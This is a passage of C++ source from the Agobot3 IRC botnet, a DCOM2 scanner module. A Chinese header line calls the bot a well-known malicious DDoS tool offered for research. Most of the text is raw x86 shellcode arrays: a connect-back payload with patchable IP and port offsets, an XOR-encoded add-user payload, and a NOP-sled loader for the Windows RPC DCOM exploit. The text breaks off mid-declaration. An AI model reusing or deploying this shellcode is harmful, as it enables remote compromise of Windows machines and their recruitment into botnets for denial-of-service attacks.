dcom2scanner.cpp.svn-base

很有名的一款用于组织DDoS的恶意机器人程序。仅供研究学习

/*	Agobot3 - a modular IRC bot for Win32 / Linux
	Copyright (c) 2003 Ago
	All rights reserved.

	This is private software, you may redistribute it under the terms of
	the APL(Ago's Private License) which follows:
  
	Redistribution and use in binary forms, with or without modification,
	are permitted provided that the following conditions are met:
	1. The name of the author may not be used to endorse or promote products
	   derived from this software without specific prior written permission.
	2. The binary may not be sold and/or given away for free.
	3. The licensee may only create binaries for his own usage, not for any
	   third parties.

	Redistribution and use in source forms, with or without modification,
	are not permitted.

	THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
	IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
	OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
	IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
	INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
	NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
	DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
	THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
	(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
	THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */

#include "main.h"
#include "mainctrl.h"
#include "utility.h"
#include "shellcode.h"

// It's fixed now. :-)

class CScannerDCOM2 : public CScannerBase
{
public:
	CScannerDCOM2();
	virtual ~CScannerDCOM2() throw() { }

	bool Exploit();
};

#define DCOM2_SHELLCODE_OFFSET_IP	0x16D	// Offset for the IP to connect to
#define DCOM2_SHELLCODE_OFFSET_PORT	0x171	// Offset for the port to connect to

char dcom2_shellcode[]=
	"\x64\x63\x6F\x6D\x68\x78\x30\x72\xE9\x5F\x01\x00\x00\x5B\x56"
	"\x57\x50\xE8\xB3\x03\x00\x00\x8D\xB3\x9F\x00\x00\x00\x8D\xBB\xA8"
	"\x00\x00\x00\xC7\x83\xA7\x01\x00\x00\x0F\x00\x00\x00\xE8\x07\x03"
	"\x00\x00\x89\x83\xF4\x00\x00\x00\x8D\xBB\xB7\x00\x00\x00\xC7\x83"
	"\xA7\x01\x00\x00\x0D\x00\x00\x00\xE8\xEC\x02\x00\x00\x89\x83\xF0"
	"\x00\x00\x00\x8D\xBB\xC4\x00\x00\x00\xE8\xC3\x02\x00\x00\x89\x83"
	"\xE4\x00\x00\x00\x8D\xBB\xCA\x00\x00\x00\xE8\xB2\x02\x00\x00\x89"
	"\x83\xE8\x00\x00\x00\x8D\xBB\xD5\x00\x00\x00\xE8\xA1\x02\x00\x00"
	"\x89\x83\xEC\x00\x00\x00\x8D\xB3\x0A\x00\x00\x00\x8D\xBB\x11\x00"
	"\x00\x00\xE8\x8A\x02\x00\x00\x89\x83\x41\x00\x00\x00\x8D\xBB\x1C"
	"\x00\x00\x00\xE8\x79\x02\x00\x00\x89\x83\x45\x00\x00\x00\x8D\xBB"
	"\x23\x00\x00\x00\xE8\x68\x02\x00\x00\x89\x83\x49\x00\x00\x00\x8D"
	"\xBB\x2B\x00\x00\x00\xE8\x57\x02\x00\x00\x89\x83\x4D\x00\x00\x00"
	"\x8D\xBB\x30\x00\x00\x00\xE8\x46\x02\x00\x00\x89\x83\x51\x00\x00"
	"\x00\x8D\xBB\x35\x00\x00\x00\xE8\x35\x02\x00\x00\x89\x83\x55\x00"
	"\x00\x00\x8D\xB3\x59\x00\x00\x00\x8D\xBB\x60\x00\x00\x00\xE8\x1E"
	"\x02\x00\x00\x89\x83\x87\x00\x00\x00\x8D\xBB\x66\x00\x00\x00\xE8"
	"\x0D\x02\x00\x00\x89\x83\x8B\x00\x00\x00\x8D\xBB\x6D\x00\x00\x00"
	"\xE8\xFC\x01\x00\x00\x89\x83\x8F\x00\x00\x00\x8D\xBB\x74\x00\x00"
	"\x00\xE8\xEB\x01\x00\x00\x89\x83\x93\x00\x00\x00\x8D\xBB\x7B\x00"
	"\x00\x00\xE8\xDA\x01\x00\x00\x89\x83\x97\x00\x00\x00\x8D\xBB\x82"
	"\x00\x00\x00\xE8\xC9\x01\x00\x00\x89\x83\x9B\x00\x00\x00\x53\xE8"
	"\xEB\x02\x00\x00\x5B\x58\x5F\x5E\xE8\x10\x05\x00\x00\xE8\x9C\xFE"
	"\xFF\xFF\x00\x00\x00\x00\x11\x11\x11\x11\x22\x22\x77\x73\x32\x5F"
	"\x33\x32\x00\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x00\x73\x6F"
	"\x63\x6B\x65\x74\x00\x63\x6F\x6E\x6E\x65\x63\x74\x00\x72\x65\x63"
	"\x76\x00\x73\x65\x6E\x64\x00\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B"
	"\x65\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x73\x76\x63\x72"
	"\x74\x00\x66\x6F\x70\x65\x6E\x00\x66\x63\x6C\x6F\x73\x65\x00\x66"
	"\x77\x72\x69\x74\x65\x00\x6D\x65\x6D\x73\x65\x74\x00\x6D\x61\x6C"
	"\x6C\x6F\x63\x00\x66\x72\x65\x65\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x6B\x65\x72\x6E\x65\x6C\x33\x32\x00\x47\x65\x74\x50\x72\x6F"
	"\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62"
	"\x72\x61\x72\x79\x41\x00\x53\x6C\x65\x65\x70\x00\x45\x78\x69\x74"
	"\x54\x68\x72\x65\x61\x64\x00\x43\x72\x65\x61\x74\x65\x50\x72\x6F"
	"\x63\x65\x73\x73\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x77\x2B\x62\x00\x00\x00\x00\x00\x77\x69"
	"\x6E\x68\x6C\x70\x70\x33\x32\x2E\x65\x78\x65\x00\x6F\x70\x65\x6E"
	"\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x51\x57\x56\x56\xFF\x93\xF0\x00\x00\x00\x50\x59\x57\x51\xFF"
	"\x93\xF4\x00\x00\x00\x5E\x5F\x59\xC3\x31\xC0\x89\x83\xA3\x01\x00"
	"\x00\x8B\x93\xA3\x01\x00\x00\x3B\x93\x93\x01\x00\x00\x7D\x63\x42"
	"\x89\x93\xA3\x01\x00\x00\x31\xC0\x8B\x83\xA3\x01\x00\x00\xC1\xE0"
	"\x02\x8B\x8B\x9B\x01\x00\x00\x01\xC1\x8B\x01\x03\x83\x8F\x01\x00"
	"\x00\x57\x56\x51\x89\xFE\x89\xC7\x8B\x8B\xA7\x01\x00\x00\xF3\xA6"
	"\x59\x5E\x5F\x75\xBC\x31\xC0\x8B\x83\xA3\x01\x00\x00\xD1\xE0\x8B"
	"\x8B\x9F\x01\x00\x00\x01\xC1\x31\xC0\x66\x8B\x01\xC1\xE0\x02\x8B"
	"\x8B\x97\x01\x00\x00\x01\xC8\x8B\x08\x03\x8B\x8F\x01\x00\x00\x89"
	"\xC8\xC3\x31\xC0\xC3\xE9\xC8\x02\x00\x00\x3E\x8B\x40\x34\x3E\x8B"
	"\xA8\xB8\x00\x00\x00\xE9\x0E\x00\x00\x00\x50\x51\x56\x55\x64\xA1"
	"\x30\x00\x00\x00\x85\xC0\x78\xE2\x3E\x8B\x40\x0C\x3E\x8B\x70\x1C"
	"\xAD\x3E\x8B\x68\x08\x89\xAB\x8F\x01\x00\x00\x89\xE8\x66\x81\x38"
	"\x4D\x5A\x75\xC1\x05\x3C\x00\x00\x00\x8B\x08\x03\x8B\x8F\x01\x00"
	"\x00\x66\x81\x39\x50\x45\x75\xAD\x81\xC1\x78\x00\x00\x00\x8B\x31"
	"\x03\xB3\x8F\x01\x00\x00\x81\xC6\x18\x00\x00\x00\xAD\x89\x83\x93"
	"\x01\x00\x00\xAD\x03\x83\x8F\x01\x00\x00\x89\x83\x97\x01\x00\x00"
	"\xAD\x03\x83\x8F\x01\x00\x00\x89\x83\x9B\x01\x00\x00\xAD\x03\x83"
	"\x8F\x01\x00\x00\x89\x83\x9F\x01\x00\x00\x5D\x5E\x59\x58\xC3\x50"
	"\xB8\x00\x04\x00\x00\xE8\x71\x01\x00\x00\x3D\x00\x00\x00\x00\x0F"
	"\x84\xEA\xFF\xFF\xFF\x89\x83\x83\x01\x00\x00\x58\x8B\x93\x83\x01"
	"\x00\x00\x52\x68\x01\x01\x00\x00\x3E\xFF\x53\x41\x3D\x00\x00\x00"
	"\x00\x0F\x85\xE5\xFF\xFF\xFF\x68\x06\x00\x00\x00\x68\x01\x00\x00"
	"\x00\x68\x02\x00\x00\x00\x3E\xFF\x53\x45\x3D\xFF\xFF\xFF\xFF\x0F"
	"\x84\xE2\xFF\xFF\xFF\x89\x83\xF8\x00\x00\x00\x57\x50\x53\x8D\x93"
	"\x7F\x01\x00\x00\xC6\x02\x16\x52\x8D\x93\xFC\x00\x00\x00\x66\xC7"
	"\x02\x02\x00\x66\x8B\x7B\x08\x66\x89\x7A\x02\x8B\x7B\x04\x89\x7A"
	"\x04\x52\x8B\x83\xF8\x00\x00\x00\x50\x3E\xFF\x53\x49\x3D\x00\x00"
	"\x00\x00\x0F\x8C\xC6\xFF\xFF\xFF\x5B\x58\x5F\x50\xB8\x00\x10\x00"
	"\x00\xE8\xD5\x00\x00\x00\x3D\x00\x00\x00\x00\x0F\x84\xEA\xFF\xFF"
	"\xFF\x89\x83\x60\x01\x00\x00\x58\xE8\x39\x00\x00\x00\xE8\xD8\x00"
	"\x00\x00\xE8\x57\x00\x00\x00\xE8\x1F\x01\x00\x00\xC3\x8B\x83\xF8"
	"\x00\x00\x00\x50\x3E\xFF\x53\x55\x8B\x83\xAB\x01\x00\x00\x40\x89"
	"\x83\xAB\x01\x00\x00\x3D\x05\x00\x00\x00\x0F\x84\x05\x00\x00\x00"
	"\xE9\x42\xFF\xFF\xFF\xC3\x68\x00\x00\x00\x00\x68\x04\x00\x00\x00"
	"\x8D\x93\x87\x01\x00\x00\x52\x8B\x93\xF8\x00\x00\x00\x52\x3E\xFF"
	"\x53\x4D\x3D\x01\x00\x00\x00\x0F\x8C\xB0\xFF\xFF\xFF\xC3\x57\x56"
	"\x8B\xBB\x87\x01\x00\x00\x8B\xB3\x8B\x01\x00\x00\x39\xF7\x5E\x5F"
	"\x0F\x84\x32\x00\x00\x00\x68\x00\x00\x00\x00\x68\x00\x10\x00\x00"
	"\x8B\x93\x60\x01\x00\x00\x52\x8B\x93\xF8\x00\x00\x00\x52\x3E\xFF"
	"\x53\x4D\x3D\x01\x00\x00\x00\x0F\x8C\x70\xFF\xFF\xFF\x01\x83\x8B"
	"\x01\x00\x00\xE9\x50\x00\x00\x00\xE8\x6E\x00\x00\x00\x50\x8B\x83"
	"\xF8\x00\x00\x00\x50\x3E\xFF\x53\x55\x58\xC3\x89\xC7\x50\x3E\xFF"
	"\x93\x97\x00\x00\x00\x5F\x50\x57\x68\x00\x00\x00\x00\x50\x3E\xFF"
	"\x93\x93\x00\x00\x00\x5F\x5F\x5F\x58\xC3\x8D\x93\x64\x01\x00\x00"
	"\x52\x8D\x93\x6C\x01\x00\x00\x52\x3E\xFF\x93\x87\x00\x00\x00\x5F"
	"\x5F\x89\x83\x68\x01\x00\x00\xC3\xFF\xB3\x68\x01\x00\x00\x50\x68"
	"\x01\x00\x00\x00\x8B\x93\x60\x01\x00\x00\x52\x3E\xFF\x93\x8F\x00"
	"\x00\x00\x5F\x5F\x5F\x5F\xE9\x43\xFF\xFF\xFF\x8B\x93\x68\x01\x00"
	"\x00\x52\x3E\xFF\x93\x8B\x00\x00\x00\x5F\xC3\x50\x8D\x83\x0C\x01"
	"\x00\x00\x50\x8D\x83\x1C\x01\x00\x00\x50\x68\x00\x00\x00\x00\x68"
	"\x00\x00\x00\x00\x68\x28\x00\x00\x00\x68\x00\x00\x00\x00\x68\x00"
	"\x00\x00\x00\x68\x00\x00\x00\x00\x8D\x83\x6C\x01\x00\x00\x50\x68"
	"\x00\x00\x00\x00\x3E\xFF\x93\xEC\x00\x00\x00\x58\xC3\xE8\xA9\xFF"
	"\xFF\xFF\x68\x00\x00\x00\x00\xFF\x93\xE8\x00\x00\x00\x90";

char dcom2_shellcode_adduser[]=
	"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
	"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
	"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
	"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
	"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
	"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
	"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
	"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
	"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
	"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
	"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
	"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
	"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
	"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
	"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
	"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
	"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
	"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
	"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
	"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";

char dcom2_loader[]=
	"\xE8\x00\x00\x00\x00\x58\x66\x31\xC0\x40\x81\x38\x64\x63\x6F"
	"\x6D\x75\xF7\x81\x78\x04\x68\x78\x30\x72\x75\xEE\x05\x08\x00\x00"
	"\x00\xFF\xE0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90";

char dcom2_bindstr[]=